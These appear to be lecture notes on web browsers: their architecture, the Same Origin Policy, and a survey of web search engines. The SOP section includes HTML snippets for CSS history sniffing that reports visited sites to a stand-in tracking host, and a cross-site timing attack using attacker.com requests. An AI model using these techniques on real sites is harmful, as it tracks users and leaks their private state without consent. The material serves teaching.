Web Browser
A web browser is a program that retrieves documents from remote servers and displays them on the screen. Resources can be requested explicitly by URI, or implicitly by following embedded hyperlinks.
The visual appearance of a web page encoded in HTML can be enhanced with other technologies.
The first is Cascading Style Sheets (CSS), which add layout and style information to web pages without complicating the original structural mark-up.
The second is JavaScript (now standardized as the ECMAScript scripting language [1]), a scripting language for client-side computation, for which the browser acts as the host environment. It is embedded within HTML documents, and the displayed page is the result of evaluating the JavaScript code and applying it to the static HTML constructs.
The last is plugins [2]: small extensions that are loaded by the browser and used to display content types that the browser cannot display directly, such as Macromedia Flash animations and Java applets.
[1] ECMA International is an industry association founded in 1961 and dedicated to the standardization of Information and Communication Technology (ICT) and Consumer Electronics (CE).
[2] A plug-in (also called plugin, addin, add-in, addon, add-on, snap-in, snapin) is a small computer program that extends the capabilities of a larger program. Plugins are commonly used in web browsers to play sounds and video clips, or to decompress files automatically.
A REFERENCE ARCHITECTURE FOR WEB BROWSERS
5. The JavaScript Interpreter evaluates JavaScript code, which may be embedded in web pages. JavaScript is an object-oriented scripting language developed by Brendan Eich for Netscape in 1995. Certain JavaScript features, such as the opening of pop-up windows, may be disabled by the Browser Engine or Rendering Engine for security purposes. The following table lists examples of JavaScript interpreters.
[3] MIME was originally intended for use with e-mail attachments; in fact, MIME stands for Multipurpose Internet Mail Extensions. Unix systems used a .mailcap file, a table associating MIME types with application programs. Early browsers relied on this mechanism, which has since been replaced by the browsers' own MIME configuration tables.
6. The XML Parser subsystem parses XML documents into a Document Object Model (DOM) tree.
7. The Display Backend subsystem provides drawing and windowing primitives, a set of user interface widgets, and a set of fonts. It may be tied closely to the operating system.
8. The Data Persistence subsystem stores on disk various data associated with the browsing session. These may be high-level data such as bookmarks or toolbar settings, or low-level data such as cookies, security certificates, or caches.
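As an illustration of what the XML Parser subsystem (item 6) produces, the following minimal sketch parses a small XML document into a DOM tree and walks it. It uses the xml.dom.minidom module from the Python standard library rather than a browser's own parser, and the sample document and the helper name element_names are assumptions made up for this example.

```python
from xml.dom.minidom import parseString

# Hypothetical sample document; the element names are invented for illustration.
SAMPLE_XML = (
    "<bookmarks>"
    "<bookmark href='http://example.org/'>Example</bookmark>"
    "</bookmarks>"
)


def element_names(node, depth=0):
    """Return (depth, tag name) pairs for every element in the DOM subtree."""
    names = []
    if node.nodeType == node.ELEMENT_NODE:
        names.append((depth, node.tagName))
    for child in node.childNodes:
        # Text nodes are visited too, but only elements are recorded.
        names.extend(element_names(child, depth + 1))
    return names


# parseString builds the whole DOM tree in memory.
document = parseString(SAMPLE_XML)
tree = element_names(document.documentElement)

for depth, name in tree:
    print("  " * depth + name)
```

The same tree structure is what scripts later navigate through the DOM interface, for example to read the href attribute of the bookmark element.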
WEB BROWSER: THE NEW OS
The following table compares a classical OS with the Internet browser.
Browser Same Origin Policy (SOP)
Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages.
Examples:
http://www.AWebSite.com:80/Page1.html
The origin is identified by (http, www.AWebSite.com, 80).
https://www.AWebSite.com/Page1.html
In this case the origin is identified by (https, www.AWebSite.com, ): no port is specified, so the default port for https, 443, applies.
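The comparison can be sketched in a few lines of Python. This is only a minimal illustration, not how any particular browser implements the check: the function names origin and same_origin are hypothetical, and filling in the default port (80 for http, 443 for https) when none is given is an assumption of this sketch.

```python
from urllib.parse import urlsplit

# Assumption of this sketch: a missing port is replaced by the scheme's default.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) triple that identifies a URL's origin."""
    parts = urlsplit(url)
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    # urlsplit lower-cases the scheme and the host name.
    return (parts.scheme, parts.hostname, port)


def same_origin(url_a, url_b):
    """Two URLs share an origin when scheme, host and port all match."""
    return origin(url_a) == origin(url_b)


print(origin("http://www.AWebSite.com:80/Page1.html"))
print(origin("https://www.AWebSite.com/Page1.html"))
print(same_origin("http://www.AWebSite.com:80/Page1.html",
                  "https://www.AWebSite.com/Page1.html"))
```

The two example URLs differ in both protocol and port, so they are treated as different origins even though the host and path are identical.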
The interaction between sites of different domains is regulated by the SOP. Every browser implements this policy, which means:
- on the client side: cookies from origin A (document.domain) are not visible to origin B; scripts from origin A cannot read or set properties of origin B through the DOM interface.
- on the server side: the SOP allows only “send-only” communication to a remote site.
Setting the document.domain property of a web page changes the origin of the page: this property sets or returns the domain name of the server from which the document originated.
Some Same Origin Policy (SOP) Violations
1) Tracking users by querying the user's history file.
<style> a:visited { background: url("http://www.badsite.com/trackuser.php?bank.com"); } </style> <a href="http://www.bank.com/">Hi!</a>
Possible applications of this type of violation include:
- Spear phishing;
- Marketing;
- Using browsing history as a second authentication factor.
2) Cross-site Timing attacks.
The response time depends on private user state, for example:
- Whether the user is logged in or not;
- The number of items in the shopping cart;
- And so on.
In general, all web sites leak some information through timing.
A link tag can be used to leak timing information, because a browser stops parsing until the linked resource is resolved.
<head> <link rel="stylesheet" href="http://attacker.com/img1.gif"> <link rel="stylesheet" href="http://victim.com/login.html" /> <img src="http://attacker.com/img2.gif"> </head>
The attacker learns how long victim.com/login.html took to load from the interval between the requests for img1.gif and img2.gif arriving at attacker.com.
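The arithmetic behind this measurement can be sketched as follows. This is a simplified illustration under stated assumptions: the sample timestamps are invented, the function names are hypothetical, and the idea that a logged-in page loads more slowly than a logged-out one (so that a single threshold separates the two) is an assumption that would need calibration against the actual site.

```python
from statistics import median


def victim_load_times(samples):
    """Return the interval between the two bracketing requests for each sample.

    Each sample is a pair (t_img1, t_img2): the arrival times, in seconds,
    of the requests for img1.gif and img2.gif at the attacker's server.
    """
    return [t_img2 - t_img1 for t_img1, t_img2 in samples]


def guess_logged_in(samples, threshold_s):
    """Guess the user's state by comparing the median interval to a threshold.

    Assumption: the logged-in page takes longer to load than the login page.
    """
    return median(victim_load_times(samples)) > threshold_s


# Invented measurements from three page loads by the same visitor.
observed = [(10.0, 10.5), (20.0, 20.25), (30.0, 30.75)]

print(victim_load_times(observed))
print(guess_logged_in(observed, threshold_s=0.4))
```

Taking the median over several loads reduces the effect of network jitter on any single measurement.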
REFERENCES
[01] Alan Grosskurth, Michael W. Godfrey, Architecture and evolution of the modern web browser, David R. Cheriton School of Computer Science, University of Waterloo, Waterloo, 2006;
[02] Iris Lai, Jared Haines, John Chun-Hung Chiu, Josh Fairhead, Conceptual Architecture of Mozilla Firefox (version 2.0.0.3), SEng 422 Assignment 1, Dr. Ahmed E. Hassan, 2007;
[03] Nicchi A., Web Applications: technologies and models, Edizioni Accademiche Italiane, 2014;
[04] Charles Reis, Steven D. Gribble, Isolating Web Programs in Modern Browser Architectures, University of Washington, 2009;
[05] Stanford Advanced Computer Security Certificate Program, Browser Security Model and SOAP Violations, 2007.
Web Search Engines
According to [2], “The Indexed Web contains at least 2.02 billion pages (Saturday, 05 July, 2014)”.
As a consequence, we need a web search engine if we want to find something of interest on the Web or the answer to a question.
For this reason, search engines generally serve as “Internet users' entry point to the digital world” [1] (ComScore [3] defines searches as “user engagement with a search service with the intent to retrieve search results.”).
The following figure gives an overview of the web search scenario in relation to the huge quantity of web pages.
We have many types of web search engines working on indexed pages:
- GENERAL SEARCH ENGINE like Google, Bing and Yahoo;
- COMPUTATIONAL KNOWLEDGE ENGINE like www.wolframalpha.com;
- ANSWER SEARCH ENGINE like www.chacha.com;
- IMAGE SEARCH ENGINE like www.picsearch.com;
- VIDEO SEARCH ENGINE like on.aol.com;
- TORRENT SEARCH ENGINE like www.ktorrents.com;
- PERSON SEARCH ENGINE like www.spokeo.com;
- EMAIL SEARCH ENGINE like www.emailsherlock.com;
- BUSINESS SEARCH ENGINE like www.business.com;
- BLOG AND FORUM SEARCH ENGINE like omgili.com;
- META-SEARCH ENGINE like www.dogpile.com.
Although there are many search services, web search is still dominated by Google, Microsoft and Yahoo. The following figure gives a clear idea of this, even though it refers to 2012: the graph is based on 200 billion searches done in the United States in 2012 [1].
The next step for web search engines will be semantic search, because people are going to communicate with them in a way that is much more natural to their thinking. Search engines should therefore try to understand the meaning of a query and give the most appropriate and pertinent answer.
REFERENCES
[1] The Global Edition of the New York Times, Friday, April 5, 2013, page 15, “Web Searches that try to read your mind”;
[2] http://www.worldwidewebsize.com/;
[3] http://www.comscore.com/: Analytics for a Digital World™.